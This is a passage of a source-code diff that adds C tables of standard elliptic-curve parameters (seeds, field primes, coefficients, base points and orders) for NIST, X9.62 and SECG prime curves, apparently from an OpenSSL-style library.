+        0xB3, 0x31, 0x2F, 0xA7, 0xE2, 0x3E, 0xE7, 0xE4, 0x98, 0x8E, 0x05, 0x6B,
+        0xE3, 0xF8, 0x2D, 0x19, 0x18, 0x1D, 0x9C, 0x6E, 0xFE, 0x81, 0x41, 0x12,
+        0x03, 0x14, 0x08, 0x8F, 0x50, 0x13, 0x87, 0x5A, 0xC6, 0x56, 0x39, 0x8D,
+        0x8A, 0x2E, 0xD1, 0x9D, 0x2A, 0x85, 0xC8, 0xED, 0xD3, 0xEC, 0x2A, 0xEF,
+        /* x */
+        0xAA, 0x87, 0xCA, 0x22, 0xBE, 0x8B, 0x05, 0x37, 0x8E, 0xB1, 0xC7, 0x1E,
+        0xF3, 0x20, 0xAD, 0x74, 0x6E, 0x1D, 0x3B, 0x62, 0x8B, 0xA7, 0x9B, 0x98,
+        0x59, 0xF7, 0x41, 0xE0, 0x82, 0x54, 0x2A, 0x38, 0x55, 0x02, 0xF2, 0x5D,
+        0xBF, 0x55, 0x29, 0x6C, 0x3A, 0x54, 0x5E, 0x38, 0x72, 0x76, 0x0A, 0xB7,
+        /* y */
+        0x36, 0x17, 0xde, 0x4a, 0x96, 0x26, 0x2c, 0x6f, 0x5d, 0x9e, 0x98, 0xbf,
+        0x92, 0x92, 0xdc, 0x29, 0xf8, 0xf4, 0x1d, 0xbd, 0x28, 0x9a, 0x14, 0x7c,
+        0xe9, 0xda, 0x31, 0x13, 0xb5, 0xf0, 0xb8, 0xc0, 0x0a, 0x60, 0xb1, 0xce,
+        0x1d, 0x7e, 0x81, 0x9d, 0x7a, 0x43, 0x1d, 0x7c, 0x90, 0xea, 0x0e, 0x5f,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC7, 0x63, 0x4D, 0x81, 0xF4, 0x37, 0x2D, 0xDF, 0x58, 0x1A, 0x0D, 0xB2,
+        0x48, 0xB0, 0xA7, 0x7A, 0xEC, 0xEC, 0x19, 0x6A, 0xCC, 0xC5, 0x29, 0x73
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 66 * 6];
+} _EC_NIST_PRIME_521 = {
+    {
+        NID_X9_62_prime_field, 20, 66, 1
+    },
+    {
+        /* seed */
+        0xD0, 0x9E, 0x88, 0x00, 0x29, 0x1C, 0xB8, 0x53, 0x96, 0xCC, 0x67, 0x17,
+        0x39, 0x32, 0x84, 0xAA, 0xA0, 0xDA, 0x64, 0xBA,
+        /* p */
+        0x01, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0x01, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x00, 0x51, 0x95, 0x3E, 0xB9, 0x61, 0x8E, 0x1C, 0x9A, 0x1F, 0x92, 0x9A,
+        0x21, 0xA0, 0xB6, 0x85, 0x40, 0xEE, 0xA2, 0xDA, 0x72, 0x5B, 0x99, 0xB3,
+        0x15, 0xF3, 0xB8, 0xB4, 0x89, 0x91, 0x8E, 0xF1, 0x09, 0xE1, 0x56, 0x19,
+        0x39, 0x51, 0xEC, 0x7E, 0x93, 0x7B, 0x16, 0x52, 0xC0, 0xBD, 0x3B, 0xB1,
+        0xBF, 0x07, 0x35, 0x73, 0xDF, 0x88, 0x3D, 0x2C, 0x34, 0xF1, 0xEF, 0x45,
+        0x1F, 0xD4, 0x6B, 0x50, 0x3F, 0x00,
+        /* x */
+        0x00, 0xC6, 0x85, 0x8E, 0x06, 0xB7, 0x04, 0x04, 0xE9, 0xCD, 0x9E, 0x3E,
+        0xCB, 0x66, 0x23, 0x95, 0xB4, 0x42, 0x9C, 0x64, 0x81, 0x39, 0x05, 0x3F,
+        0xB5, 0x21, 0xF8, 0x28, 0xAF, 0x60, 0x6B, 0x4D, 0x3D, 0xBA, 0xA1, 0x4B,
+        0x5E, 0x77, 0xEF, 0xE7, 0x59, 0x28, 0xFE, 0x1D, 0xC1, 0x27, 0xA2, 0xFF,
+        0xA8, 0xDE, 0x33, 0x48, 0xB3, 0xC1, 0x85, 0x6A, 0x42, 0x9B, 0xF9, 0x7E,
+        0x7E, 0x31, 0xC2, 0xE5, 0xBD, 0x66,
+        /* y */
+        0x01, 0x18, 0x39, 0x29, 0x6a, 0x78, 0x9a, 0x3b, 0xc0, 0x04, 0x5c, 0x8a,
+        0x5f, 0xb4, 0x2c, 0x7d, 0x1b, 0xd9, 0x98, 0xf5, 0x44, 0x49, 0x57, 0x9b,
+        0x44, 0x68, 0x17, 0xaf, 0xbd, 0x17, 0x27, 0x3e, 0x66, 0x2c, 0x97, 0xee,
+        0x72, 0x99, 0x5e, 0xf4, 0x26, 0x40, 0xc5, 0x50, 0xb9, 0x01, 0x3f, 0xad,
+        0x07, 0x61, 0x35, 0x3c, 0x70, 0x86, 0xa2, 0x72, 0xc2, 0x40, 0x88, 0xbe,
+        0x94, 0x76, 0x9f, 0xd1, 0x66, 0x50,
+        /* order */
+        0x01, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFA, 0x51, 0x86,
+        0x87, 0x83, 0xBF, 0x2F, 0x96, 0x6B, 0x7F, 0xCC, 0x01, 0x48, 0xF7, 0x09,
+        0xA5, 0xD0, 0x3B, 0xB5, 0xC9, 0xB8, 0x89, 0x9C, 0x47, 0xAE, 0xBB, 0x6F,
+        0xB7, 0x1E, 0x91, 0x38, 0x64, 0x09
+    }
+};
+
+/* the x9.62 prime curves (minus the nist prime curves) */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_X9_62_PRIME_192V2 = {
+    {
+        NID_X9_62_prime_field, 20, 24, 1
+    },
+    {
+        /* seed */
+        0x31, 0xA9, 0x2E, 0xE2, 0x02, 0x9F, 0xD1, 0x0D, 0x90, 0x1B, 0x11, 0x3E,
+        0x99, 0x07, 0x10, 0xF0, 0xD2, 0x1A, 0xC6, 0xB6,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0xCC, 0x22, 0xD6, 0xDF, 0xB9, 0x5C, 0x6B, 0x25, 0xE4, 0x9C, 0x0D, 0x63,
+        0x64, 0xA4, 0xE5, 0x98, 0x0C, 0x39, 0x3A, 0xA2, 0x16, 0x68, 0xD9, 0x53,
+        /* x */
+        0xEE, 0xA2, 0xBA, 0xE7, 0xE1, 0x49, 0x78, 0x42, 0xF2, 0xDE, 0x77, 0x69,
+        0xCF, 0xE9, 0xC9, 0x89, 0xC0, 0x72, 0xAD, 0x69, 0x6F, 0x48, 0x03, 0x4A,
+        /* y */
+        0x65, 0x74, 0xd1, 0x1d, 0x69, 0xb6, 0xec, 0x7a, 0x67, 0x2b, 0xb8, 0x2a,
+        0x08, 0x3d, 0xf2, 0xf2, 0xb0, 0x84, 0x7d, 0xe9, 0x70, 0xb2, 0xde, 0x15,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE,
+        0x5F, 0xB1, 0xA7, 0x24, 0xDC, 0x80, 0x41, 0x86, 0x48, 0xD8, 0xDD, 0x31
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_X9_62_PRIME_192V3 = {
+    {
+        NID_X9_62_prime_field, 20, 24, 1
+    },
+    {
+        /* seed */
+        0xC4, 0x69, 0x68, 0x44, 0x35, 0xDE, 0xB3, 0x78, 0xC4, 0xB6, 0x5C, 0xA9,
+        0x59, 0x1E, 0x2A, 0x57, 0x63, 0x05, 0x9A, 0x2E,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x22, 0x12, 0x3D, 0xC2, 0x39, 0x5A, 0x05, 0xCA, 0xA7, 0x42, 0x3D, 0xAE,
+        0xCC, 0xC9, 0x47, 0x60, 0xA7, 0xD4, 0x62, 0x25, 0x6B, 0xD5, 0x69, 0x16,
+        /* x */
+        0x7D, 0x29, 0x77, 0x81, 0x00, 0xC6, 0x5A, 0x1D, 0xA1, 0x78, 0x37, 0x16,
+        0x58, 0x8D, 0xCE, 0x2B, 0x8B, 0x4A, 0xEE, 0x8E, 0x22, 0x8F, 0x18, 0x96,
+        /* y */
+        0x38, 0xa9, 0x0f, 0x22, 0x63, 0x73, 0x37, 0x33, 0x4b, 0x49, 0xdc, 0xb6,
+        0x6a, 0x6d, 0xc8, 0xf9, 0x97, 0x8a, 0xca, 0x76, 0x48, 0xa9, 0x43, 0xb0,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7A, 0x62, 0xD0, 0x31, 0xC8, 0x3F, 0x42, 0x94, 0xF6, 0x40, 0xEC, 0x13
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_PRIME_239V1 = {
+    {
+        NID_X9_62_prime_field, 20, 30, 1
+    },
+    {
+        /* seed */
+        0xE4, 0x3B, 0xB4, 0x60, 0xF0, 0xB8, 0x0C, 0xC0, 0xC0, 0xB0, 0x75, 0x79,
+        0x8E, 0x94, 0x80, 0x60, 0xF8, 0x32, 0x1B, 0x7D,
+        /* p */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x6B, 0x01, 0x6C, 0x3B, 0xDC, 0xF1, 0x89, 0x41, 0xD0, 0xD6, 0x54, 0x92,
+        0x14, 0x75, 0xCA, 0x71, 0xA9, 0xDB, 0x2F, 0xB2, 0x7D, 0x1D, 0x37, 0x79,
+        0x61, 0x85, 0xC2, 0x94, 0x2C, 0x0A,
+        /* x */
+        0x0F, 0xFA, 0x96, 0x3C, 0xDC, 0xA8, 0x81, 0x6C, 0xCC, 0x33, 0xB8, 0x64,
+        0x2B, 0xED, 0xF9, 0x05, 0xC3, 0xD3, 0x58, 0x57, 0x3D, 0x3F, 0x27, 0xFB,
+        0xBD, 0x3B, 0x3C, 0xB9, 0xAA, 0xAF,
+        /* y */
+        0x7d, 0xeb, 0xe8, 0xe4, 0xe9, 0x0a, 0x5d, 0xae, 0x6e, 0x40, 0x54, 0xca,
+        0x53, 0x0b, 0xa0, 0x46, 0x54, 0xb3, 0x68, 0x18, 0xce, 0x22, 0x6b, 0x39,
+        0xfc, 0xcb, 0x7b, 0x02, 0xf1, 0xae,
+        /* order */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0x9E, 0x5E, 0x9A, 0x9F, 0x5D, 0x90, 0x71, 0xFB, 0xD1,
+        0x52, 0x26, 0x88, 0x90, 0x9D, 0x0B
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_PRIME_239V2 = {
+    {
+        NID_X9_62_prime_field, 20, 30, 1
+    },
+    {
+        /* seed */
+        0xE8, 0xB4, 0x01, 0x16, 0x04, 0x09, 0x53, 0x03, 0xCA, 0x3B, 0x80, 0x99,
+        0x98, 0x2B, 0xE0, 0x9F, 0xCB, 0x9A, 0xE6, 0x16,
+        /* p */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x61, 0x7F, 0xAB, 0x68, 0x32, 0x57, 0x6C, 0xBB, 0xFE, 0xD5, 0x0D, 0x99,
+        0xF0, 0x24, 0x9C, 0x3F, 0xEE, 0x58, 0xB9, 0x4B, 0xA0, 0x03, 0x8C, 0x7A,
+        0xE8, 0x4C, 0x8C, 0x83, 0x2F, 0x2C,
+        /* x */
+        0x38, 0xAF, 0x09, 0xD9, 0x87, 0x27, 0x70, 0x51, 0x20, 0xC9, 0x21, 0xBB,
+        0x5E, 0x9E, 0x26, 0x29, 0x6A, 0x3C, 0xDC, 0xF2, 0xF3, 0x57, 0x57, 0xA0,
+        0xEA, 0xFD, 0x87, 0xB8, 0x30, 0xE7,
+        /* y */
+        0x5b, 0x01, 0x25, 0xe4, 0xdb, 0xea, 0x0e, 0xc7, 0x20, 0x6d, 0xa0, 0xfc,
+        0x01, 0xd9, 0xb0, 0x81, 0x32, 0x9f, 0xb5, 0x55, 0xde, 0x6e, 0xf4, 0x60,
+        0x23, 0x7d, 0xff, 0x8b, 0xe4, 0xba,
+        /* order */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x80, 0x00, 0x00, 0xCF, 0xA7, 0xE8, 0x59, 0x43, 0x77, 0xD4, 0x14, 0xC0,
+        0x38, 0x21, 0xBC, 0x58, 0x20, 0x63
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_X9_62_PRIME_239V3 = {
+    {
+        NID_X9_62_prime_field, 20, 30, 1
+    },
+    {
+        /* seed */
+        0x7D, 0x73, 0x74, 0x16, 0x8F, 0xFE, 0x34, 0x71, 0xB6, 0x0A, 0x85, 0x76,
+        0x86, 0xA1, 0x94, 0x75, 0xD3, 0xBF, 0xA2, 0xFF,
+        /* p */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x25, 0x57, 0x05, 0xFA, 0x2A, 0x30, 0x66, 0x54, 0xB1, 0xF4, 0xCB, 0x03,
+        0xD6, 0xA7, 0x50, 0xA3, 0x0C, 0x25, 0x01, 0x02, 0xD4, 0x98, 0x87, 0x17,
+        0xD9, 0xBA, 0x15, 0xAB, 0x6D, 0x3E,
+        /* x */
+        0x67, 0x68, 0xAE, 0x8E, 0x18, 0xBB, 0x92, 0xCF, 0xCF, 0x00, 0x5C, 0x94,
+        0x9A, 0xA2, 0xC6, 0xD9, 0x48, 0x53, 0xD0, 0xE6, 0x60, 0xBB, 0xF8, 0x54,
+        0xB1, 0xC9, 0x50, 0x5F, 0xE9, 0x5A,
+        /* y */
+        0x16, 0x07, 0xe6, 0x89, 0x8f, 0x39, 0x0c, 0x06, 0xbc, 0x1d, 0x55, 0x2b,
+        0xad, 0x22, 0x6f, 0x3b, 0x6f, 0xcf, 0xe4, 0x8b, 0x6e, 0x81, 0x84, 0x99,
+        0xaf, 0x18, 0xe3, 0xed, 0x6c, 0xf3,
+        /* order */
+        0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x7F, 0xFF, 0xFF, 0x97, 0x5D, 0xEB, 0x41, 0xB3, 0xA6, 0x05, 0x7C, 0x3C,
+        0x43, 0x21, 0x46, 0x52, 0x65, 0x51
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 32 * 6];
+} _EC_X9_62_PRIME_256V1 = {
+    {
+        NID_X9_62_prime_field, 20, 32, 1
+    },
+    {
+        /* seed */
+        0xC4, 0x9D, 0x36, 0x08, 0x86, 0xE7, 0x04, 0x93, 0x6A, 0x66, 0x78, 0xE1,
+        0x13, 0x9D, 0x26, 0xB7, 0x81, 0x9F, 0x7E, 0x90,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x5A, 0xC6, 0x35, 0xD8, 0xAA, 0x3A, 0x93, 0xE7, 0xB3, 0xEB, 0xBD, 0x55,
+        0x76, 0x98, 0x86, 0xBC, 0x65, 0x1D, 0x06, 0xB0, 0xCC, 0x53, 0xB0, 0xF6,
+        0x3B, 0xCE, 0x3C, 0x3E, 0x27, 0xD2, 0x60, 0x4B,
+        /* x */
+        0x6B, 0x17, 0xD1, 0xF2, 0xE1, 0x2C, 0x42, 0x47, 0xF8, 0xBC, 0xE6, 0xE5,
+        0x63, 0xA4, 0x40, 0xF2, 0x77, 0x03, 0x7D, 0x81, 0x2D, 0xEB, 0x33, 0xA0,
+        0xF4, 0xA1, 0x39, 0x45, 0xD8, 0x98, 0xC2, 0x96,
+        /* y */
+        0x4f, 0xe3, 0x42, 0xe2, 0xfe, 0x1a, 0x7f, 0x9b, 0x8e, 0xe7, 0xeb, 0x4a,
+        0x7c, 0x0f, 0x9e, 0x16, 0x2b, 0xce, 0x33, 0x57, 0x6b, 0x31, 0x5e, 0xce,
+        0xcb, 0xb6, 0x40, 0x68, 0x37, 0xbf, 0x51, 0xf5,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xBC, 0xE6, 0xFA, 0xAD, 0xA7, 0x17, 0x9E, 0x84,
+        0xF3, 0xB9, 0xCA, 0xC2, 0xFC, 0x63, 0x25, 0x51
+    }
+};
+
+/* the secg prime curves (minus the nist and x9.62 prime curves) */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 14 * 6];
+} _EC_SECG_PRIME_112R1 = {
+    {
+        NID_X9_62_prime_field, 20, 14, 1
+    },
+    {
+        /* seed */
+        0x00, 0xF5, 0x0B, 0x02, 0x8E, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61,
+        0x51, 0x75, 0x29, 0x04, 0x72, 0x78, 0x3F, 0xB1,
+        /* p */
+        0xDB, 0x7C, 0x2A, 0xBF, 0x62, 0xE3, 0x5E, 0x66, 0x80, 0x76, 0xBE, 0xAD,
+        0x20, 0x8B,
+        /* a */
+        0xDB, 0x7C, 0x2A, 0xBF, 0x62, 0xE3, 0x5E, 0x66, 0x80, 0x76, 0xBE, 0xAD,
+        0x20, 0x88,
+        /* b */
+        0x65, 0x9E, 0xF8, 0xBA, 0x04, 0x39, 0x16, 0xEE, 0xDE, 0x89, 0x11, 0x70,
+        0x2B, 0x22,
+        /* x */
+        0x09, 0x48, 0x72, 0x39, 0x99, 0x5A, 0x5E, 0xE7, 0x6B, 0x55, 0xF9, 0xC2,
+        0xF0, 0x98,
+        /* y */
+        0xa8, 0x9c, 0xe5, 0xaf, 0x87, 0x24, 0xc0, 0xa2, 0x3e, 0x0e, 0x0f, 0xf7,
+        0x75, 0x00,
+        /* order */
+        0xDB, 0x7C, 0x2A, 0xBF, 0x62, 0xE3, 0x5E, 0x76, 0x28, 0xDF, 0xAC, 0x65,
+        0x61, 0xC5
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 14 * 6];
+} _EC_SECG_PRIME_112R2 = {
+    {
+        NID_X9_62_prime_field, 20, 14, 4
+    },
+    {
+        /* seed */
+        0x00, 0x27, 0x57, 0xA1, 0x11, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61,
+        0x51, 0x75, 0x53, 0x16, 0xC0, 0x5E, 0x0B, 0xD4,
+        /* p */
+        0xDB, 0x7C, 0x2A, 0xBF, 0x62, 0xE3, 0x5E, 0x66, 0x80, 0x76, 0xBE, 0xAD,
+        0x20, 0x8B,
+        /* a */
+        0x61, 0x27, 0xC2, 0x4C, 0x05, 0xF3, 0x8A, 0x0A, 0xAA, 0xF6, 0x5C, 0x0E,
+        0xF0, 0x2C,
+        /* b */
+        0x51, 0xDE, 0xF1, 0x81, 0x5D, 0xB5, 0xED, 0x74, 0xFC, 0xC3, 0x4C, 0x85,
+        0xD7, 0x09,
+        /* x */
+        0x4B, 0xA3, 0x0A, 0xB5, 0xE8, 0x92, 0xB4, 0xE1, 0x64, 0x9D, 0xD0, 0x92,
+        0x86, 0x43,
+        /* y */
+        0xad, 0xcd, 0x46, 0xf5, 0x88, 0x2e, 0x37, 0x47, 0xde, 0xf3, 0x6e, 0x95,
+        0x6e, 0x97,
+        /* order */
+        0x36, 0xDF, 0x0A, 0xAF, 0xD8, 0xB8, 0xD7, 0x59, 0x7C, 0xA1, 0x05, 0x20,
+        0xD0, 0x4B
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 16 * 6];
+} _EC_SECG_PRIME_128R1 = {
+    {
+        NID_X9_62_prime_field, 20, 16, 1
+    },
+    {
+        /* seed */
+        0x00, 0x0E, 0x0D, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51, 0x75,
+        0x0C, 0xC0, 0x3A, 0x44, 0x73, 0xD0, 0x36, 0x79,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0xE8, 0x75, 0x79, 0xC1, 0x10, 0x79, 0xF4, 0x3D, 0xD8, 0x24, 0x99, 0x3C,
+        0x2C, 0xEE, 0x5E, 0xD3,
+        /* x */
+        0x16, 0x1F, 0xF7, 0x52, 0x8B, 0x89, 0x9B, 0x2D, 0x0C, 0x28, 0x60, 0x7C,
+        0xA5, 0x2C, 0x5B, 0x86,
+        /* y */
+        0xcf, 0x5a, 0xc8, 0x39, 0x5b, 0xaf, 0xeb, 0x13, 0xc0, 0x2d, 0xa2, 0x92,
+        0xdd, 0xed, 0x7a, 0x83,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x75, 0xA3, 0x0D, 0x1B,
+        0x90, 0x38, 0xA1, 0x15
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 16 * 6];
+} _EC_SECG_PRIME_128R2 = {
+    {
+        NID_X9_62_prime_field, 20, 16, 4
+    },
+    {
+        /* seed */
+        0x00, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51, 0x75, 0x12, 0xD8,
+        0xF0, 0x34, 0x31, 0xFC, 0xE6, 0x3B, 0x88, 0xF4,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xD6, 0x03, 0x19, 0x98, 0xD1, 0xB3, 0xBB, 0xFE, 0xBF, 0x59, 0xCC, 0x9B,
+        0xBF, 0xF9, 0xAE, 0xE1,
+        /* b */
+        0x5E, 0xEE, 0xFC, 0xA3, 0x80, 0xD0, 0x29, 0x19, 0xDC, 0x2C, 0x65, 0x58,
+        0xBB, 0x6D, 0x8A, 0x5D,
+        /* x */
+        0x7B, 0x6A, 0xA5, 0xD8, 0x5E, 0x57, 0x29, 0x83, 0xE6, 0xFB, 0x32, 0xA7,
+        0xCD, 0xEB, 0xC1, 0x40,
+        /* y */
+        0x27, 0xb6, 0x91, 0x6a, 0x89, 0x4d, 0x3a, 0xee, 0x71, 0x06, 0xfe, 0x80,
+        0x5f, 0xc3, 0x4b, 0x44,
+        /* order */
+        0x3F, 0xFF, 0xFF, 0xFF, 0x7F, 0xFF, 0xFF, 0xFF, 0xBE, 0x00, 0x24, 0x72,
+        0x06, 0x13, 0xB5, 0xA3
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 21 * 6];
+} _EC_SECG_PRIME_160K1 = {
+    {
+        NID_X9_62_prime_field, 0, 21, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xAC, 0x73,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
